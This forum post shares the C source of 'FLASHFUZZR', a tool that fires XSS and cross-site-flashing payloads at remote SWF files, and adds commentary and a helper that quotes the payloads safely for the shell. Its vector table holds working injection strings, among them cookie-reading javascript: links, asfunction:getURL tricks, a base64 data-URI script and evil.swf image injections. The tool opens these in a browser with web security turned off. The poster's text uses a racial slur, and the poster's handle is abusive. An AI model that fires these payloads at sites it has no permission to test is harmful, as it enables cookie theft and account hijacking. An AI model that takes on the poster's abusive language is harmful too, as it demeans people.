
Fuzz remote SWF for XSS/XSF.

  1. #1
    Sophie Pedophile Tech Support
So my nigga' MLT has written a fuzzer to look for XSS/XSF vulnerabilities in remote SWF files. Below is a copypasta of the source code he released. To use it, compile the program with GCC using the following command.

    gcc -o flashfuzz flashfuzz.c -std=gnu11

Furthermore, you will need to be on Linux, have Flare installed and have Flash enabled in Firefox. Other than that, the on-screen instructions are easy to follow; just make sure to input your target host's SWF as a URL. What's pretty neat is that it comes with an option to decompile the target SWF as well.

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <strings.h>
    #include <dirent.h>
    #include <unistd.h>

    /*
     * FLASHFUZZR
     * Version 1.0 - Written by MLT
     *
     * Dependencies: Linux, gnome-www-browser, Flare
     *
     * I am not responsible for this tool being used for illegal or malicious
     * purposes.
     *
     * P.S: I know this is written in a sloppy manner, but it gets the job done
     * regardless. Compilation tested w/ gcc/g++ (c11/gnu11 std).
     *
     * Usage:
     *   Follow the on-screen instructions. Supply SWF as URL only. Ensure that
     *   you're using a linux system with Flare installed. I will be writing a
     *   Windows port for this at some point, but for now this is designed for
     *   linux. You'll need to ensure you input the correct full path for the
     *   directory of your flare install.
     *
     * protip: remember to enable flash in firefox (it's disabled by default).
     * gnome-www-browser will launch your default browser, chrome is best choice.
     *
     * make sure you have your browser already open with a few tabs open before
     * running the program. FULL README is located at bottom of the source.
     */

    #define MAX_FILES 20      /* modify this if necessary */
    #define BOX_WIDTH 97

    /* GET-based vectors appended to the target SWF URL. Each vector is wrapped
     * in single quotes so /bin/sh hands it to the browser untouched; a literal
     * ' inside a vector therefore has to be written as '\'' (getUrlJSParam and
     * the <img src='evil.swf'> vector). The original declared this as
     * char the_vectors[129][1000] with only these entries filled in, so the
     * fuzz loop also fired ~115 empty requests; sizing the array from its
     * initialiser fixes that. */
    static const char *the_vectors[] = {
        "'?mode=tags&tagcloud=<tags><a+href=\"javascript:alert(document.cookie)\"+style=\"font-size:+40pt\">Click me</a></tags>'",
        "'?mode=tags&tagcloud=<tags><a+href=\"javascript:prompt(document.cookie)\"+style=\"font-size:+40pt\">Click me</a></tags>'",
        "'?mode=tags&tagcloud=<tags><a+href=\"javascript:confirm(document.cookie)\"+style=\"font-size:+40pt\">Click me</a></tags>'",
        "'?mode=tags&tagcloud=<tags><a+href=\"javascript:alert`1`\"+style=\"font-size:+40pt\">Click me</a></tags>'",
        "'?mode=tags&tagcloud=<tags><a+href=\"javascript:prompt`1`\"+style=\"font-size:+40pt\">Click me</a></tags>'",
        "'?mode=tags&tagcloud=<tags><a+href=\"javascript:confirm`1`\"+style=\"font-size:+40pt\">Click me</a></tags>'",
        "'?mode=tags&tagcloud=<tags><a+href=\"\"+style=\"font-size:+40pt\">Click me</a></tags>'",
        "'?mode=tags&tagcloud=<tags><a+href=\"data:text/html;base64,PHNjcmlwdD5hbGVydCgwKTwvc2NyaXB0Pg==\"+style=\"font-size:+40pt\">Click me</a></tags>'",
        "'?getUrlJSParam='\\'');function eval(a){}prompt(0)//'",
        "'?htmlVar=<a href=\"asfunction:getURL,javascript:prompt(0)\"> Click here</a>'",
        "'?htmlVar=<a href=\"asfunction:getURL,javascript:confirm(0)\"> Click here</a>'",
        "'?htmlVar=<a href=\"asfunction:getURL,javascript:alert`0`\"> Click here</a>'",
        "'?htmlVar=a<img src='\\''evil.swf'\\'' />'",
        "'?fontVar=\"><img src=\"evil.swf\"><\"'",
    };

    /* will update with moar vectors sometime soon
     * if anyone has any contributions then feel
     * free to contact me via email */

    /* Banner helpers: the original hand-padded every printf() line to the box
     * width; computing the padding here keeps the box aligned. */
    static void box_border(const char *left, const char *right)
    {
        printf(" %s+", left);
        for (int i = 0; i < BOX_WIDTH; i++)
            putchar('-');
        printf("+%s\n", right);
    }

    static void box_line(const char *text)
    {
        printf(" 0001110010| %-*s |1010100111\n", BOX_WIDTH - 2, text);
    }

    static void box_top(void)
    {
        printf("\n\n");
        box_border("1011101110", "1010010011");
        box_line("[ FLASHFUZZR ]");
        box_line("");
    }

    static void box_bottom(void)
    {
        box_border("0110110100", "1011010000");
        printf("\n\n\n");
    }

    static void bad_input(void)
    {
        /* worst error handling in existence because i'm fkn lazy :) */
        fprintf(stderr, "\nRead the instructions next time!\n");
        fprintf(stderr, "\nProgram closing!\n\n\n");
    }

    int main(void)
    {
        DIR *path;
        struct dirent *ptr;
        int primaryInput, helpMenuInput, usageInput, fuzzInput, finalInput;
        int num;
        char *files[MAX_FILES];
        char url[150], dir[100], cmd[1000], flare[1000], buffer[1000];

    MainMenu: // LOL YEP
        box_top();
        box_line("Automated GET-Based XSS/XSF Fuzzer for SWF's");
        box_line("Version 1.0 - Written by MLT (@ret2libc)");
        box_line("");
        box_line("Contact me:");
        box_line("");
        box_line("Type '1' to display instructions");
        box_line("");
        box_bottom();

        if (scanf("%d", &primaryInput) != 1 || primaryInput != 1) {
            bad_input();
            return 1;
        }

    HelpMenu:
        box_top();
        box_line("Help Menu");
        box_line("OPTIONS:");
        box_line("");
        box_line("1 - Usage Guide");
        box_line("2 - Fuzz for XSS/XSF");
        box_line("3 - Decompile SWF");
        box_line("4 - Return to start page");
        box_line("");
        box_line("[ Select an option to continue ]");
        box_bottom();

        if (scanf("%d", &helpMenuInput) != 1)
            helpMenuInput = 0;

        if (helpMenuInput == 1) {
            box_top();
            box_line("Usage Guide");
            box_line("");
            box_line("To fuzz an SWF for XSS/XSF simply navigate to the help menu then select");
            box_line("the 'fuzz for XSS/XSF' option and input the remote URL to the SWF file");
            box_line("when instructed - firefox will then begin to open browser windows and");
            box_line("begin fuzzing for vulns.");
            box_line("");
            box_line("To decompile an SWF, navigate to the help menu and select the 'decompile");
            box_line("SWF' option and follow the instructions on screen");
            box_line("");
            box_line("Dependencies:");
            box_line("");
            box_line("- Mozilla Firefox");
            box_line("- Linux");
            box_line("- Flare");
            box_line("");
            box_line("Type '1' to return to help menu");
            box_bottom();

            if (scanf("%d", &usageInput) == 1 && usageInput == 1)
                goto HelpMenu; // sue me :)
        } else if (helpMenuInput == 2) {
            box_top();
            box_line("Begin Fuzzing");
            box_line("");
            box_line("In order to begin fuzzing for vulnerabilities, please enter the direct");
            box_line("link to the remote URL below and hit the 'enter' key to confirm. Ensure");
            box_line("that firefox is installed and that the URL to the SWF you're testing is");
            box_line("correctly typed.");
            box_line("");
            box_line("ENTER PATH TO SWF URL:");
            box_line("");
            box_line("Type '1' to return to help menu");
            box_bottom();

            /* one token serves both purposes: "1" returns to the help menu,
             * anything else is the target URL */
            if (scanf("%149s", url) != 1)
                return 1;
            if (strcmp(url, "1") == 0)
                goto HelpMenu; // sue me :)
            /* the URL is spliced into a shell command below inside single
             * quotes, so refuse the one character that could break out of them */
            if (strchr(url, '\'') != NULL) {
                fprintf(stderr, "\nURL must not contain a single quote\n");
                return 1;
            }

            printf("\n\n\n\n\n [+] Fuzzing initiated on: %s [+]\n\n\n\n\n", url);

            for (size_t i = 0; i < sizeof(the_vectors) / sizeof(the_vectors[0]); i++) {
                /* 'url' immediately followed by 'vector': the shell joins the
                 * two quoted strings into one argument */
                snprintf(buffer, sizeof buffer, "'%s'%s", url, the_vectors[i]);
                snprintf(cmd, sizeof cmd, "gnome-www-browser --disable-web-security %s", buffer);
                system(cmd);     /* one browser tab per vector */
                usleep(100000);  /* original: system("sleep .10") */
            }

            printf("\n\n\n\n\n [+] Fuzzing on: %s complete [+]\n\n\n\n\n", url);
            printf(" check each browser tab to see if any vulns are present\n\n\n");
            printf("\n Enter '1' to exit the program, or alternatively enter '2' to return to the main menu\n\n\n");

            if (scanf("%d", &fuzzInput) != 1)
                fuzzInput = 0;

            if (fuzzInput == 1)
                printf("\nProgram closing!\n\n\n");
            else if (fuzzInput == 2)
                goto MainMenu; // sue me :)
            else
                bad_input();
        } else if (helpMenuInput == 3) {
            box_top();
            box_line("SWF Decompiler");
            box_line("");
            box_line("Copy the SWF files you want decompiled into your 'flare' directory first");
            box_line("Enter the full path to that directory to begin decompilation");
            box_bottom();

            /* make sure to follow the installation instructions for flare and
             * when running this program specify the full path to the directory
             * where you unpacked the tarball for flare.
             *
             * you should also ensure that you have the SWF files that you wish
             * to decompile stored within this same directory.
             *
             * I didn't bother implementing proper err handling for this, so if
             * you fuck up you won't be warned. Follow the instructions and it
             * should work fine :) */

            printf("\nEnter the path to the directory of your flare install:\n\n\n");
            if (scanf("%99s", dir) != 1 || strchr(dir, '\'') != NULL ||
                (path = opendir(dir)) == NULL) {
                fprintf(stderr, "\nInvalid directory\n");
                return 1;
            }

            /* collect every .swf in the flare directory (the original wrote the
             * listing to listing.txt and read it straight back; the temp file
             * is not needed) */
            num = 0;
            while ((ptr = readdir(path)) != NULL && num < MAX_FILES) {
                size_t len = strlen(ptr->d_name);
                if (ptr->d_name[0] == '.' || len < 4 ||
                    strcasecmp(ptr->d_name + len - 4, ".swf") != 0 ||
                    strchr(ptr->d_name, '\'') != NULL)
                    continue;
                printf("%s\n", ptr->d_name);
                files[num++] = strdup(ptr->d_name);
            }
            closedir(path);

            for (int x = 0; x < num; x++) {
                printf("Performing decompilation on: \n%s\n", files[x]);
                /* run ./flare <file> from inside the flare directory, as the
                 * original did; flare writes the .flr next to the SWF */
                snprintf(flare, sizeof flare, "cd '%s' && ./flare '%s'", dir, files[x]);
                system(flare);
                free(files[x]);
            }

            printf("\nDecompilation complete!\n\n\n");
            printf("\nEnter '1' to exit the program, or alternatively enter '2' to return to the main menu\n\n\n");
            if (scanf("%d", &finalInput) != 1)
                finalInput = 0;

            if (finalInput == 1)
                printf("\nProgram closing!\n\n\n");
            else if (finalInput == 2)
                goto MainMenu; // sue me :)
        } else if (helpMenuInput == 4) {
            goto MainMenu; // sue me :)
        } else {
            bad_input();
        }

        return 0;
    }

    /*
     * README: Full list of dependencies and errors you may encounter
     *
     * The purpose of this program is to allow you to easily perform blackbox + whitebox testing on
     * SWF files for vulns such as cross site scripting and cross site flashing.
     * In addition to this, I've also added some functionality for decompilation of SWF's.
     *
     * I noticed flare (probably the most basic command-line flash decompiler) is very limited in
     * what you can do with it, so I've added a feature here to allow you to specify a directory and
     * have flare automatically decompile every SWF file within that directory so you can then view
     * the .flr files and begin to analyze the code for bugs.
     *
     * There are a few dependencies, for now this is working only for linux, you'll need to ensure
     * that you have gnome-www-browser installed as i'm using this as an alternative to xdg-open due
     * to extra functionality when launching a URL.
     *
     * In order to have the SWF decompilation feature working properly, you'll have to ensure you
     * specify the correct directory where your flare install is located when prompted.
     *
     * you'll also want to modify the size of files[] as appropriate (assuming you're decompiling
     * more than 20 files at once)
     *
     * In order to install flare, download the tarball from here:
     *
     *
     * I'm making this launch browser processes rather than opening a socket because this greatly
     * reduces (100% reduction) false positives and allows you to see the results in real time
     *
     * I suggest using google chrome for this, firefox will probably be buggy. Before you run this
     * program, make sure you already have google chrome open with more than one tab opened.
     *
     * If you experience any issues with chrome not opening each instance in a new tab instantly, then
     * run the following command then try again:
     *
     *   pkill -9 chrome
     *
     * if there's still an issue, try running this:
     *
     *   for i in `pgrep chrome` ; do kill $i ; sleep .10 ; done
     *
     * I didn't bother implementing proper error handling for the CLI-based menu (as you can prob tell)
     * Just make sure to follow the on-screen instructions and you shouldn't have any problems.
     *
     * also i'm aware this is probably vulnerable to BoF and is also passing user inputs to system();
     * but I see no real risk here. If you wanna perform RCE or BoF ON YOUR OWN SYSTEM LOCALLY then
     * be my guest.
     *
     * ensure that you have write privs for the area you're running this in.
     *
     * to compile and execute:
     *   gcc -o flashfuzz flashfuzz.c -std=gnu11
     *   ./flashfuzz
     */
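The fuzzer builds each request by gluing the target URL and a vector into a `system()` command line, so any vector that contains a single quote (the `getUrlJSParam` payload `');function eval(a){}prompt(0)//` does) has to be escaped at the shell level or the shell parses `)` and `{}` as syntax. The example below is added here and is not part of MLT's source: `shell_single_quote()` is a general escaper for /bin/sh single quoting, `build_fuzz_cmd()` composes URL + vector and quotes the whole thing once, and the `main()` dry-runs two of the post's vectors against the placeholder target `http://swf.example/movie.swf`, printing the command instead of launching a browser.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Wrap s in single quotes for /bin/sh, rewriting every embedded ' as '\''
 * (close quote, escaped quote, reopen quote). Inside single quotes the shell
 * interprets nothing else, so this is sufficient for arbitrary bytes except
 * NUL. Returns a malloc'd string the caller frees, or NULL on allocation failure. */
char *shell_single_quote(const char *s)
{
    size_t n = 2;                       /* opening and closing quote */
    for (const char *p = s; *p; p++)
        n += (*p == '\'') ? 4 : 1;      /* one ' expands to four bytes */

    char *out = malloc(n + 1);
    if (!out)
        return NULL;

    char *q = out;
    *q++ = '\'';
    for (const char *p = s; *p; p++) {
        if (*p == '\'') {
            memcpy(q, "'\\''", 4);
            q += 4;
        } else {
            *q++ = *p;
        }
    }
    *q++ = '\'';
    *q = '\0';
    return out;
}

/* Compose the fuzz URL exactly as FLASHFUZZR does (target URL + raw vector)
 * and return a command line that is safe to hand to system(): the combined
 * URL is a single quoted argument, so neither the operator's URL nor a vector
 * containing ' ) ; or {} can alter the command. Caller frees the result. */
char *build_fuzz_cmd(const char *browser, const char *url, const char *vector)
{
    size_t ulen = strlen(url), vlen = strlen(vector);
    char *fuzz_url = malloc(ulen + vlen + 1);
    if (!fuzz_url)
        return NULL;
    memcpy(fuzz_url, url, ulen);
    memcpy(fuzz_url + ulen, vector, vlen + 1);

    char *quoted = shell_single_quote(fuzz_url);
    free(fuzz_url);
    if (!quoted)
        return NULL;

    size_t n = strlen(browser) + 1 + strlen(quoted) + 1;
    char *cmd = malloc(n);
    if (cmd)
        snprintf(cmd, n, "%s %s", browser, quoted);
    free(quoted);
    return cmd;
}

int main(void)
{
    /* constructed sample: two of FLASHFUZZR's vectors, without any shell quoting */
    static const char *vectors[] = {
        "?mode=tags&tagcloud=<tags><a+href=\"javascript:alert(document.cookie)\">Click me</a></tags>",
        "?getUrlJSParam=');function eval(a){}prompt(0)//",
    };
    const char *target = "http://swf.example/movie.swf";   /* placeholder target */

    for (size_t i = 0; i < sizeof vectors / sizeof vectors[0]; i++) {
        char *cmd = build_fuzz_cmd("gnome-www-browser --disable-web-security", target, vectors[i]);
        if (!cmd)
            return 1;
        puts(cmd);      /* dry run: print the command instead of system(cmd) */
        free(cmd);
    }
    return 0;
}
```

Quoting the composed URL once, after concatenation, is simpler and safer than pre-quoting each vector in the table, because a quote typo in one table entry can no longer desynchronise the shell parse for that request. Swapping `puts(cmd)` for `system(cmd)` gives the original tool's behaviour; execing the browser directly with `execvp()` would avoid the shell altogether.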
